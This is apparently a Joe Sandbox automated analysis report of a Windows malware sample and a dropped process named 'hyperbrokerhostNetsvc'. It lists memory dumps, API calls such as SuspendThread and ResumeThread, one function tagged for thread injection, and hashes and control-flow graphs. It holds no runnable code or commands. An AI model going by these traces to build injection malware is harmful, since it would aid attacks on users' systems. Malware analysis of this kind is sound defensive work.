                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                      • API String ID: 1091760877-2248577382
                                                                      • Opcode ID: 2310be08d0f229aef079de61c49423f7c00235e23d8f676a982f03d6b2a237a2
                                                                      • Instruction ID: 65f5fa5c20084786c7cd8e97dce8fbf185cc470c5415863bd7098db51bd1213d
                                                                      • Opcode Fuzzy Hash: 2310be08d0f229aef079de61c49423f7c00235e23d8f676a982f03d6b2a237a2
                                                                      • Instruction Fuzzy Hash: B5D05BB150452477C62033246C4DDBF3A15DF12731B51471DF179A52E5CF1D49C196A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,007CDA55,?), ref: 007CE2A3
                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,007CDA55,?), ref: 007CE2B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandleModuleResource
                                                                      • String ID: RTL
                                                                      • API String ID: 3537982541-834975271
                                                                      • Opcode ID: e9860521368414a48aeaf78cdb873322f7221cdca933c9202480866f36ac18e2
                                                                      • Instruction ID: d5ab03d72669aba8f725a4ce5a85dac8f0889f49095766e2bd65b93820aeecac
                                                                      • Opcode Fuzzy Hash: e9860521368414a48aeaf78cdb873322f7221cdca933c9202480866f36ac18e2
                                                                      • Instruction Fuzzy Hash: 08C08C31240B1066EB3027757C0EFA36F59BB00B21F09444EB682EA2D1DEEDC980CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE467
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: p}$z}
                                                                      • API String ID: 1269201914-339952203
                                                                      • Opcode ID: 52279bdf83c44f9f0592c7ebab2178aa08c71b3616c7fb9e781128b54518977a
                                                                      • Instruction ID: 090f38241c526865000a52b05e303c59b01156704f3d846b61c2738def9d9002
                                                                      • Opcode Fuzzy Hash: 52279bdf83c44f9f0592c7ebab2178aa08c71b3616c7fb9e781128b54518977a
                                                                      • Instruction Fuzzy Hash: 56B012D125C084BC310671542D06D37012CD4C0F10330502FFB04C8781D84C0E441433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE467
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: U}$p}
                                                                      • API String ID: 1269201914-2839050623
                                                                      • Opcode ID: 3c03cf095ffdcfb4c87f0c8a4b0c38ed3ca34c8ffbf21aacc7bd2eb5b451a960
                                                                      • Instruction ID: de71aed33ff4a019c9883b2fdfb22892bdbd80aa0f45328f8db5c46b5b4d6eec
                                                                      • Opcode Fuzzy Hash: 3c03cf095ffdcfb4c87f0c8a4b0c38ed3ca34c8ffbf21aacc7bd2eb5b451a960
                                                                      • Instruction Fuzzy Hash: DDB012D135C084BC310631502E06C37022CC4C0F10330D02FFB00C8681D84C0E451433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:2.4%
                                                                      Dynamic/Decrypted Code Coverage:75%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:12
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 19872 7ff8490c0d95 19873 7ff8490c0daf GetFileAttributesW 19872->19873 19875 7ff8490c0e75 19873->19875 19880 7ff8490becbb 19881 7ff8490becc6 ResumeThread 19880->19881 19883 7ff8490bedc4 19881->19883 19884 7ff8490bee19 19885 7ff8490bee27 FindCloseChangeNotification 19884->19885 19887 7ff8490bef04 19885->19887 19876 7ff8490bd4cd 19877 7ff8490bd4db SuspendThread 19876->19877 19879 7ff8490bd5b4 19877->19879

                                                                      Executed Functions

                                                                      Function 00007FF848F10DA8 Relevance: .3, Instructions: 298COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 101 7ff848f10da8-7ff848f10dbf 102 7ff848f10dc1 101->102 103 7ff848f10dc2-7ff848f10df9 101->103 102->103 105 7ff848f10dfb 103->105 106 7ff848f10e00-7ff848f10eb7 call 7ff848f107d0 103->106 105->106 119 7ff848f10eb9-7ff848f10ece 106->119 120 7ff848f10ecf-7ff848f10fa8 106->120 119->120 133 7ff848f10faa-7ff848f10fb0 120->133 134 7ff848f10fc0 120->134 135 7ff848f10fb2 133->135 134->135 136 7ff848f10fc3-7ff848f10fdb 134->136 137 7ff848f10fdc-7ff848f10fe3 135->137 138 7ff848f10fb4-7ff848f10fbe 135->138 136->137 140 7ff848f10feb-7ff848f110dc 137->140 138->134
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c7ef11df31536ebcce5b2f06d8174cc94c8435cd9080f2afc7c66e3ce0280ac
                                                                      • Instruction ID: 119c7803e70427607db234254e1f3737dc2c6db8aebec08176ae152652f679fd
                                                                      • Opcode Fuzzy Hash: 4c7ef11df31536ebcce5b2f06d8174cc94c8435cd9080f2afc7c66e3ce0280ac
                                                                      • Instruction Fuzzy Hash: 07A1BA7092DA998FE799EB6CC8597A9BFE2FB99350F0001BAC009D72D2CB781851C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490BECBB Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: ce4452781ee3cdb931d9b6044dccaf08c6cb4e188bbc660ca1a027af1282aae3
                                                                      • Instruction ID: 055408eb319a4d27725ba5bb210f0099b44926bccade26c9144c7b085ec9441f
                                                                      • Opcode Fuzzy Hash: ce4452781ee3cdb931d9b6044dccaf08c6cb4e188bbc660ca1a027af1282aae3
                                                                      • Instruction Fuzzy Hash: A6519C7090C78C8FDB55DFA8D895AE9BBF0EF56310F0440ABD049DB292CA749846CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490BEE19 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 29db3ebc8884cfbc5e8af06d437ecf1e6c983eba9ba8e9217e23db3c250e729e
                                                                      • Instruction ID: bdf0552d2f4d519190ce5947339c5b657880976e70cd99587e4e72bc15c7272b
                                                                      • Opcode Fuzzy Hash: 29db3ebc8884cfbc5e8af06d437ecf1e6c983eba9ba8e9217e23db3c250e729e
                                                                      • Instruction Fuzzy Hash: 9A415B70D0864C8FDB59DFA8C889BEDBBF0EF56310F10416AD049DB292DA34A885CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490BD4CD Relevance: 1.6, APIs: 1, Instructions: 143threadinjectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 23 7ff8490bd4cd-7ff8490bd4d9 24 7ff8490bd4e4-7ff8490bd5b2 SuspendThread 23->24 25 7ff8490bd4db-7ff8490bd4e3 23->25 29 7ff8490bd5b4 24->29 30 7ff8490bd5ba-7ff8490bd604 24->30 25->24 29->30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: SuspendThread
                                                                      • String ID:
                                                                      • API String ID: 3178671153-0
                                                                      • Opcode ID: d7f08f36d1915d6b0f2f19925b90ce95a7aff2f19c2a427a5eb76b3d3c702997
                                                                      • Instruction ID: 708a8605d8836591479d98e752f439a7e0a997868f5610c02dc650b001c68008
                                                                      • Opcode Fuzzy Hash: d7f08f36d1915d6b0f2f19925b90ce95a7aff2f19c2a427a5eb76b3d3c702997
                                                                      • Instruction Fuzzy Hash: B0412870D0864C8FDB58EFA8D885BADBBF0FB5A310F14416AD049E7292DA74A885CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C0D95 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 33 7ff8490c0d95-7ff8490c0e73 GetFileAttributesW 37 7ff8490c0e75 33->37 38 7ff8490c0e7b-7ff8490c0eb9 33->38 37->38
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: f156ede69e9d8e10af616145192cf051b7f4a5a051dbbf87b20e2d0a7884b135
                                                                      • Instruction ID: b626b61869bad2115243b2d16db0ea96e0e07e6f37dfaed154d18262a1c801e7
                                                                      • Opcode Fuzzy Hash: f156ede69e9d8e10af616145192cf051b7f4a5a051dbbf87b20e2d0a7884b135
                                                                      • Instruction Fuzzy Hash: E7410870E0865C8FDF98EF98D885BEDBBF0EB59310F10416AD049E7252DA75A885CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0B28 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !\I
                                                                      • API String ID: 0-2717366169
                                                                      • Opcode ID: 8ffc6451b7ab24d3831346fa31370a87ebab324cbf90463b8318b03bc5998bb9
                                                                      • Instruction ID: ccba7f804e8220c40eff754cf795bba942272a2e2a048a8cfd48972cc8607ef1
                                                                      • Opcode Fuzzy Hash: 8ffc6451b7ab24d3831346fa31370a87ebab324cbf90463b8318b03bc5998bb9
                                                                      • Instruction Fuzzy Hash: 8341CD7180D7C98FDB53AF349C686A97FF0EF16205F0A01EBD498CB0A3DA285985C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D798E Relevance: .2, Instructions: 191COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 269 7ff8495d798e-7ff8495d7997 270 7ff8495d799e-7ff8495d79a4 269->270 271 7ff8495d79aa-7ff8495d79b2 270->271 272 7ff8495d7a3b-7ff8495d7aa4 270->272 271->272 273 7ff8495d7bde-7ff8495d7bee 271->273 283 7ff8495d7aa6-7ff8495d7aa7 272->283 284 7ff8495d7aae-7ff8495d7b19 272->284 277 7ff8495d7bf5-7ff8495d7bfd 273->277 283->284 292 7ff8495d7b23-7ff8495d7b8b 284->292 293 7ff8495d7b1b-7ff8495d7b1c 284->293 301 7ff8495d7b95-7ff8495d7bab 292->301 302 7ff8495d7b8d-7ff8495d7b8e 292->302 293->292 304 7ff8495d7975-7ff8495d7bb8 301->304 305 7ff8495d7bb1 301->305 302->301 304->273 305->277
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b039ee02e5f5f678c46547aa8cd7d7384f006e0455caf3b7a2022ba4c7bc3abf
                                                                      • Instruction ID: 9beca3089a6ebed38cf4bf4428203ca16a2709654a23088c86c0fc9fa9920d8a
                                                                      • Opcode Fuzzy Hash: b039ee02e5f5f678c46547aa8cd7d7384f006e0455caf3b7a2022ba4c7bc3abf
                                                                      • Instruction Fuzzy Hash: A1513D307199498FEBD9FF288498A7973D2FF99745B1045B9E00EC72A6DE28EC418740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F108D0 Relevance: .2, Instructions: 180COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 307 7ff848f108d0-7ff848f108d9 309 7ff848f108db-7ff848f108e6 307->309 310 7ff848f10916-7ff848f1098f 307->310 309->310
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25f72912e238c4565cf72ef9064dd699091cd2d990536a723548d33d6e75c836
                                                                      • Instruction ID: 1a2c8106ecc6e073857acdefcb4783ed6e9495600b16795a7fe3972ea7151497
                                                                      • Opcode Fuzzy Hash: 25f72912e238c4565cf72ef9064dd699091cd2d990536a723548d33d6e75c836
                                                                      • Instruction Fuzzy Hash: E8518F319196599FDB44FBA8E4956EDBBB0FF48354F04027AD009DB292DF38A8818794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D69FD Relevance: .1, Instructions: 145COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee9f28b44eb0e7b1b8df69a881f48b382024c5bc3a2e56558894133cd8c9201f
                                                                      • Instruction ID: 4747ea70a2d8c634770b2bf3c278436faa1c07aef963b5e90e5c06181f301471
                                                                      • Opcode Fuzzy Hash: ee9f28b44eb0e7b1b8df69a881f48b382024c5bc3a2e56558894133cd8c9201f
                                                                      • Instruction Fuzzy Hash: 80514730E0D559CFEB68EF54D8547EDB7A5FB48340F2582BAC41DD2281CB786886CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D1820 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 349 7ff8495d1820-7ff8495d185d 351 7ff8495d1860-7ff8495d1869 349->351 352 7ff8495d185f 349->352 353 7ff8495d18c6-7ff8495d18f7 351->353 354 7ff8495d186b-7ff8495d1887 351->354 352->351 359 7ff8495d18fe-7ff8495d1922 353->359 360 7ff8495d18f9 353->360 357 7ff8495d188e-7ff8495d18b5 354->357 358 7ff8495d1889 354->358 358->357 362 7ff8495d1928-7ff8495d192e 359->362 360->359
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4f4642c4909abe85c9fe2013faa5a3457063ef9c24bfb36333756eaf8bcb3f8
                                                                      • Instruction ID: f23a02779732eaad449b7c0403ca8946dd75ecc508da8231f1431feb56f910f5
                                                                      • Opcode Fuzzy Hash: b4f4642c4909abe85c9fe2013faa5a3457063ef9c24bfb36333756eaf8bcb3f8
                                                                      • Instruction Fuzzy Hash: 7A41BD3084D3C99FDB5AEF6488659E47FF0EF16340F1941EBD448CB0A2DA389985C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10998 Relevance: .1, Instructions: 114COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 134e84679ec75933ccb8f45c3ae83e07138f1bf64390284d8aced5d8daf8c14f
                                                                      • Instruction ID: 3d41c8a70f8f7d635bd242444b49de6b09bc69e9e188927b68b73d442b2e4f48
                                                                      • Opcode Fuzzy Hash: 134e84679ec75933ccb8f45c3ae83e07138f1bf64390284d8aced5d8daf8c14f
                                                                      • Instruction Fuzzy Hash: 56411B3091895D8FDB84EF98D499AEDBBF1FF98341F00017AE409E3295DB34A8818B84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10C25 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d61d02943b5ab8622590ffc9df63ae4b5b6a361c87ad9392ce9c7778515dcd5d
                                                                      • Instruction ID: 878e8685c34843d803521e4d952d06374dc39703e2786032e22b615889a77a68
                                                                      • Opcode Fuzzy Hash: d61d02943b5ab8622590ffc9df63ae4b5b6a361c87ad9392ce9c7778515dcd5d
                                                                      • Instruction Fuzzy Hash: 8D31E435D0D5AA8EE702BB68D8552FD7760EFC2355F0445B6C408DA1C3DB3C28498B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F11D88 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95f0bf59775c60f95461195e071d06b78c0d4710932068f253e9ba3d14cb32c7
                                                                      • Instruction ID: fa1d069eeb16ae8e99daa8a96e39d7c51c8d3aa03569c750963826219b52b20b
                                                                      • Opcode Fuzzy Hash: 95f0bf59775c60f95461195e071d06b78c0d4710932068f253e9ba3d14cb32c7
                                                                      • Instruction Fuzzy Hash: F341F73091816A8FEB64EB14C898AECB2F5FB58341F5042F6D40DA22D6DB786EC5CF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F15469 Relevance: .1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b003804e91ba0d168f35c75e8bbe865d0957acb7f0e0435b8ded941d1652cbe
                                                                      • Instruction ID: 716f0b1f1f0520e178c210775be1c586f8d02a5a2b9c1ad614ba06999e0365d7
                                                                      • Opcode Fuzzy Hash: 6b003804e91ba0d168f35c75e8bbe865d0957acb7f0e0435b8ded941d1652cbe
                                                                      • Instruction Fuzzy Hash: 57319970A0952D8FDBA4EF14C895BE9B3F1FB68341F1041EA904EE3691DE756E858F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10C40 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2327feac575ff68f9dfd6f6db440acb5880f94580612a74f64570c63b4a5e64f
                                                                      • Instruction ID: db08faa46ada67e9db2345921337a0bf98e4d9c9e6dcea249f4c592bfa3ce71f
                                                                      • Opcode Fuzzy Hash: 2327feac575ff68f9dfd6f6db440acb5880f94580612a74f64570c63b4a5e64f
                                                                      • Instruction Fuzzy Hash: CC11E331E0D6AA8EE702BB24D8142EA7B70EFC2351F0445B3D844DB1D2DB386909CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D18B9 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0621d600b6548c608a0df466a78d24aa4d4e9206d7df90e2e1bf5ad204ab598e
                                                                      • Instruction ID: 1148accf1cc3a7408c38e52874bf0c0425436927b8a9bec2d0ae3420a8a73c59
                                                                      • Opcode Fuzzy Hash: 0621d600b6548c608a0df466a78d24aa4d4e9206d7df90e2e1bf5ad204ab598e
                                                                      • Instruction Fuzzy Hash: B5111C7090878C8FCB49EF28C8959A97FF0EF29305F15019AE849D71A2DA75A594CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10C48 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5bde6d6f35959f717edb68d7dfb3dde94d2de74f40a992ca4ca7e97df6689aa
                                                                      • Instruction ID: 033e422e8362a987e2e189256e2cca77f7c792c30e9afc259e27a6f2fcecce2e
                                                                      • Opcode Fuzzy Hash: d5bde6d6f35959f717edb68d7dfb3dde94d2de74f40a992ca4ca7e97df6689aa
